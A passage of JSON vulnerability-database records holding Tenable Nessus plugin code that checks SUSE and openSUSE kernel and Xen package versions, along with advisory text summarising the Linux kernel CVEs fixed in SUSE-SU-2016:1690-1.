cpu:\"x86_64\", reference:\"kernel-pae-debugsource-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-base-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-base-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-debugsource-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-devel-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-debugsource-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-devel-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-4.3.4_10-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-doc-html-4.3.4_10-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.3.4_10-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-32bit-4.3.4_10-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-tools-4.3.4_10-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-tools-debuginfo-4.3.4_10-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-xend-tools-4.3.4_10-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-xend-tools-debuginfo-4.3.4_10-63.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cloop / cloop-debuginfo / cloop-debugsource / cloop-kmp-default / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-25T14:42:21", "description": "The SUSE Linux Enterprise 12 kernel was updated to 3.12.60 to receive various security and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2014-9717: fs/namespace.c in the Linux kernel processes MNT_DETACH umount2 system called without verifying that the MNT_LOCKED flag is unset, which allowed local users to bypass intended access restrictions and navigate to filesystem locations beneath a mount by calling umount2 within a user namespace (bnc#928547).\n\n - CVE-2015-8816: The hub_activate function in drivers/usb/core/hub.c in the Linux kernel did not properly maintain a hub-interface data structure, which allowed physically proximate attackers to cause a denial of service (invalid memory access and system crash) or possibly have unspecified other impact by unplugging a USB hub device (bnc#968010).\n\n - CVE-2015-8845: The tm_reclaim_thread function in arch/powerpc/kernel/process.c in the Linux kernel on powerpc platforms did not ensure that TM suspend mode exists before proceeding with a tm_reclaim call, which allowed local users to cause a denial of service (TM Bad Thing exception and panic) via a crafted application (bnc#975533).\n\n - CVE-2016-0758: Fix ASN.1 indefinite length object parsing (bsc#979867).\n\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in the Linux kernel allowed attackers to cause a denial of service (panic) via an ASN.1 BER file that lacks a public key, leading to mishandling by the public_key_verify_signature function in crypto/asymmetric_keys/public_key.c (bnc#963762).\n\n - CVE-2016-2143: The fork implementation in the Linux kernel on s390 platforms mishandled the case of four page-table levels, which allowed local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted application, related to arch/s390/include/asm/mmu_context.h and arch/s390/include/asm/pgalloc.h. (bnc#970504)\n\n - CVE-2016-2184: The create_fixed_stream_quirk function in sound/usb/quirks.c in the snd-usb-audio driver in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference or double free, and system crash) via a crafted endpoints value in a USB device descriptor (bnc#971125).\n\n - CVE-2016-2185: The ati_remote2_probe function in drivers/input/misc/ati_remote2.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#971124).\n\n - CVE-2016-2186: The powermate_probe function in drivers/input/misc/powermate.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970958).\n\n - CVE-2016-2188: The iowarrior_probe function in drivers/usb/misc/iowarrior.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970956).\n\n - CVE-2016-2782: The treo_attach function in drivers/usb/serial/visor.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by inserting a USB device that lacks a (1) bulk-in or (2) interrupt-in endpoint (bnc#968670).\n\n - CVE-2016-2847: fs/pipe.c in the Linux kernel did not limit the amount of unread data in pipes, which allowed local users to cause a denial of service (memory consumption) by creating many pipes with non-default sizes (bnc#970948).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux kernel did not validate certain offset fields, which allowed local users to gain privileges or cause a denial of service (heap memory corruption) via an IPT_SO_SET_REPLACE setsockopt call (bnc#971126).\n\n - CVE-2016-3136: The mct_u232_msr_to_state function in drivers/usb/serial/mct_u232.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted USB device without two interrupt-in endpoint descriptors (bnc#970955).\n\n - CVE-2016-3137: drivers/usb/serial/cypress_m8.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a USB device without both an interrupt-in and an interrupt-out endpoint descriptor, related to the cypress_generic_port_probe and cypress_open functions (bnc#970970).\n\n - CVE-2016-3138: The acm_probe function in drivers/usb/class/cdc-acm.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a USB device without both a control and a data endpoint descriptor (bnc#970911).\n\n - CVE-2016-3139: The wacom_probe function in drivers/input/tablet/wacom_sys.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970909).\n\n - CVE-2016-3140: The digi_port_init function in drivers/usb/serial/digi_acceleport.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970892).\n\n - CVE-2016-3156: The IPv4 implementation in the Linux kernel mishandled destruction of device objects, which allowed guest OS users to cause a denial of service (host OS networking outage) by arranging for a large number of IP addresses (bnc#971360).\n\n - CVE-2016-3672: The arch_pick_mmap_layout function in arch/x86/mm/mmap.c in the Linux kernel did not properly randomize the legacy base address, which made it easier for local users to defeat the intended restrictions on the ADDR_NO_RANDOMIZE flag, and bypass the ASLR protection mechanism for a setuid or setgid program, by disabling stack-consumption resource limits (bnc#974308).\n\n - CVE-2016-3689: The ims_pcu_parse_cdc_data function in drivers/input/misc/ims-pcu.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (system crash) via a USB device without both a master and a slave interface (bnc#971628).\n\n - CVE-2016-3951: Double free vulnerability in drivers/net/usb/cdc_ncm.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (system crash) or possibly have unspecified other impact by inserting a USB device with an invalid USB descriptor (bnc#974418).\n\n - CVE-2016-4482: The proc_connectinfo function in drivers/usb/core/devio.c in the Linux kernel did not initialize a certain data structure, which allowed local users to obtain sensitive information from kernel stack memory via a crafted USBDEVFS_CONNECTINFO ioctl call (bnc#978401).\n\n - CVE-2016-4486: The rtnl_fill_link_ifmap function in net/core/rtnetlink.c in the Linux kernel did not initialize a certain data structure, which allowed local users to obtain sensitive information from kernel stack memory by reading a Netlink message (bnc#978822).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel incorrectly relied on the write system call, which allowed local users to cause a denial of service (kernel memory write operation) or possibly have unspecified other impact via a uAPI interface (bnc#979548).\n\n - CVE-2016-4569: The snd_timer_user_params function in sound/core/timer.c in the Linux kernel did not initialize a certain data structure, which allowed local users to obtain sensitive information from kernel stack memory via crafted use of the ALSA timer interface (bnc#979213).\n\n - CVE-2016-4578: sound/core/timer.c in the Linux kernel did not initialize certain r1 data structures, which allowed local users to obtain sensitive information from kernel stack memory via crafted use of the ALSA timer interface, related to the (1) snd_timer_user_ccallback and (2) snd_timer_user_tinterrupt functions (bnc#979879).\n\n - CVE-2016-4805: Use-after-free vulnerability in drivers/net/ppp/ppp_generic.c in the Linux kernel allowed local users to cause a denial of service (memory corruption and system crash, or spinlock) or possibly have unspecified other impact by removing a network namespace, related to the ppp_register_net_channel and ppp_unregister_channel functions (bnc#980371).\n\n - CVE-2016-5244: Fixed an infoleak in rds_inc_info_copy (bsc#983213).\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-08-29T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:1690-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9717", "CVE-2015-8816", "CVE-2015-8845", "CVE-2016-0758", "CVE-2016-2053", "CVE-2016-2143", "CVE-2016-2184", "CVE-2016-2185", "CVE-2016-2186", "CVE-2016-2188", "CVE-2016-2782", "CVE-2016-2847", "CVE-2016-3134", "CVE-2016-3136", "CVE-2016-3137", "CVE-2016-3138", "CVE-2016-3139", "CVE-2016-3140", "CVE-2016-3156", "CVE-2016-3672", "CVE-2016-3689", "CVE-2016-3951", "CVE-2016-4482", "CVE-2016-4486", "CVE-2016-4565", "CVE-2016-4569", "CVE-2016-4578", "CVE-2016-4805", "CVE-2016-5244"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-1690-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93165", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1690-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93165);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-9717\", \"CVE-2015-8816\", \"CVE-2015-8845\", \"CVE-2016-0758\", \"CVE-2016-2053\", \"CVE-2016-2143\", \"CVE-2016-2184\", \"CVE-2016-2185\", \"CVE-2016-2186\", \"CVE-2016-2188\", \"CVE-2016-2782\", \"CVE-2016-2847\", \"CVE-2016-3134\", \"CVE-2016-3136\", \"CVE-2016-3137\", \"CVE-2016-3138\", \"CVE-2016-3139\", \"CVE-2016-3140\", \"CVE-2016-3156\", \"CVE-2016-3672\", \"CVE-2016-3689\", \"CVE-2016-3951\", \"CVE-2016-4482\", \"CVE-2016-4486\", \"CVE-2016-4565\", \"CVE-2016-4569\", \"CVE-2016-4578\", \"CVE-2016-4805\", \"CVE-2016-5244\");\n script_bugtraq_id(74226);\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:1690-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 kernel was updated to 3.12.60 to receive\nvarious security and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2014-9717: fs/namespace.c in the Linux kernel\n processes MNT_DETACH umount2 system called without\n verifying that the MNT_LOCKED flag is unset, which\n allowed local users to bypass intended access\n restrictions and navigate to filesystem locations\n beneath a mount by calling umount2 within a user\n namespace (bnc#928547).\n\n - CVE-2015-8816: The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel did not\n properly maintain a hub-interface data structure, which\n allowed physically proximate attackers to cause a denial\n of service (invalid memory access and system crash) or\n possibly have unspecified other impact by unplugging a\n USB hub device (bnc#968010).\n\n - CVE-2015-8845: The tm_reclaim_thread function in\n arch/powerpc/kernel/process.c in the Linux kernel on\n powerpc platforms did not ensure that TM suspend mode\n exists before proceeding with a tm_reclaim call, which\n allowed local users to cause a denial of service (TM Bad\n Thing exception and panic) via a crafted application\n (bnc#975533).\n\n - CVE-2016-0758: Fix ASN.1 indefinite length object\n parsing (bsc#979867).\n\n - CVE-2016-2053: The asn1_ber_decoder function in\n lib/asn1_decoder.c in the Linux kernel allowed attackers\n to cause a denial of service (panic) via an ASN.1 BER\n file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bnc#963762).\n\n - CVE-2016-2143: The fork implementation in the Linux\n kernel on s390 platforms mishandled the case of four\n page-table levels, which allowed local users to cause a\n denial of service (system crash) or possibly have\n unspecified other impact via a crafted application,\n related to arch/s390/include/asm/mmu_context.h and\n arch/s390/include/asm/pgalloc.h. (bnc#970504)\n\n - CVE-2016-2184: The create_fixed_stream_quirk function in\n sound/usb/quirks.c in the snd-usb-audio driver in the\n Linux kernel allowed physically proximate attackers to\n cause a denial of service (NULL pointer dereference or\n double free, and system crash) via a crafted endpoints\n value in a USB device descriptor (bnc#971125).\n\n - CVE-2016-2185: The ati_remote2_probe function in\n drivers/input/misc/ati_remote2.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#971124).\n\n - CVE-2016-2186: The powermate_probe function in\n drivers/input/misc/powermate.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#970958).\n\n - CVE-2016-2188: The iowarrior_probe function in\n drivers/usb/misc/iowarrior.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) via\n a crafted endpoints value in a USB device descriptor\n (bnc#970956).\n\n - CVE-2016-2782: The treo_attach function in\n drivers/usb/serial/visor.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) or\n possibly have unspecified other impact by inserting a\n USB device that lacks a (1) bulk-in or (2) interrupt-in\n endpoint (bnc#968670).\n\n - CVE-2016-2847: fs/pipe.c in the Linux kernel did not\n limit the amount of unread data in pipes, which allowed\n local users to cause a denial of service (memory\n consumption) by creating many pipes with non-default\n sizes (bnc#970948).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bnc#971126).\n\n - CVE-2016-3136: The mct_u232_msr_to_state function in\n drivers/usb/serial/mct_u232.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted USB device without two interrupt-in\n endpoint descriptors (bnc#970955).\n\n - CVE-2016-3137: drivers/usb/serial/cypress_m8.c in the\n Linux kernel allowed physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a USB device without both an\n interrupt-in and an interrupt-out endpoint descriptor,\n related to the cypress_generic_port_probe and\n cypress_open functions (bnc#970970).\n\n - CVE-2016-3138: The acm_probe function in\n drivers/usb/class/cdc-acm.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) via\n a USB device without both a control and a data endpoint\n descriptor (bnc#970911).\n\n - CVE-2016-3139: The wacom_probe function in\n drivers/input/tablet/wacom_sys.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#970909).\n\n - CVE-2016-3140: The digi_port_init function in\n drivers/usb/serial/digi_acceleport.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#970892).\n\n - CVE-2016-3156: The IPv4 implementation in the Linux\n kernel mishandled destruction of device objects, which\n allowed guest OS users to cause a denial of service\n (host OS networking outage) by arranging for a large\n number of IP addresses (bnc#971360).\n\n - CVE-2016-3672: The arch_pick_mmap_layout function in\n arch/x86/mm/mmap.c in the Linux kernel did not properly\n randomize the legacy base address, which made it easier\n for local users to defeat the intended restrictions on\n the ADDR_NO_RANDOMIZE flag, and bypass the ASLR\n protection mechanism for a setuid or setgid program, by\n disabling stack-consumption resource limits\n (bnc#974308).\n\n - CVE-2016-3689: The ims_pcu_parse_cdc_data function in\n drivers/input/misc/ims-pcu.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (system crash) via a USB device without both a\n master and a slave interface (bnc#971628).\n\n - CVE-2016-3951: Double free vulnerability in\n drivers/net/usb/cdc_ncm.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (system crash) or possibly have unspecified\n other impact by inserting a USB device with an invalid\n USB descriptor (bnc#974418).\n\n - CVE-2016-4482: The proc_connectinfo function in\n drivers/usb/core/devio.c in the Linux kernel did not\n initialize a certain data structure, which allowed local\n users to obtain sensitive information from kernel stack\n memory via a crafted USBDEVFS_CONNECTINFO ioctl call\n (bnc#978401).\n\n - CVE-2016-4486: The rtnl_fill_link_ifmap function in\n net/core/rtnetlink.c in the Linux kernel did not\n initialize a certain data structure, which allowed local\n users to obtain sensitive information from kernel stack\n memory by reading a Netlink message (bnc#978822).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the\n Linux kernel incorrectly relied on the write system\n call, which allowed local users to cause a denial of\n service (kernel memory write operation) or possibly have\n unspecified other impact via a uAPI interface\n (bnc#979548).\n\n - CVE-2016-4569: The snd_timer_user_params function in\n sound/core/timer.c in the Linux kernel did not\n initialize a certain data structure, which allowed local\n users to obtain sensitive information from kernel stack\n memory via crafted use of the ALSA timer interface\n (bnc#979213).\n\n - CVE-2016-4578: sound/core/timer.c in the Linux kernel\n did not initialize certain r1 data structures, which\n allowed local users to obtain sensitive information from\n kernel stack memory via crafted use of the ALSA timer\n interface, related to the (1) snd_timer_user_ccallback\n and (2) snd_timer_user_tinterrupt functions\n (bnc#979879).\n\n - CVE-2016-4805: Use-after-free vulnerability in\n drivers/net/ppp/ppp_generic.c in the Linux kernel\n allowed local users to cause a denial of service (memory\n corruption and system crash, or spinlock) or possibly\n have unspecified other impact by removing a network\n namespace, related to the ppp_register_net_channel and\n ppp_unregister_channel functions (bnc#980371).\n\n - CVE-2016-5244: Fixed an infoleak in rds_inc_info_copy\n (bsc#983213).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=676471\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=880007\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=889207\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=899908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=903279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=928547\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931448\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=940413\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=943989\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=944309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=945345\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=947337\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=953233\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=954847\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956491\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956852\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=957805\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=957986\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=960857\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=962336\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=962846\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=962872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=963193\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=963572\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=963762\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=964461\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=964727\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=965319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966054\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966245\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966573\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966831\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967251\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967292\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967299\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967903\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968141\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968448\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968670\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968687\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968812\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968813\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969439\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969690\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969992\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969993\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970062\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970114\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970504\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970506\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970604\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970909\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970911\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970948\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970955\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970956\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970958\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971049\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971124\"\n );\n script_set_attribute(\n 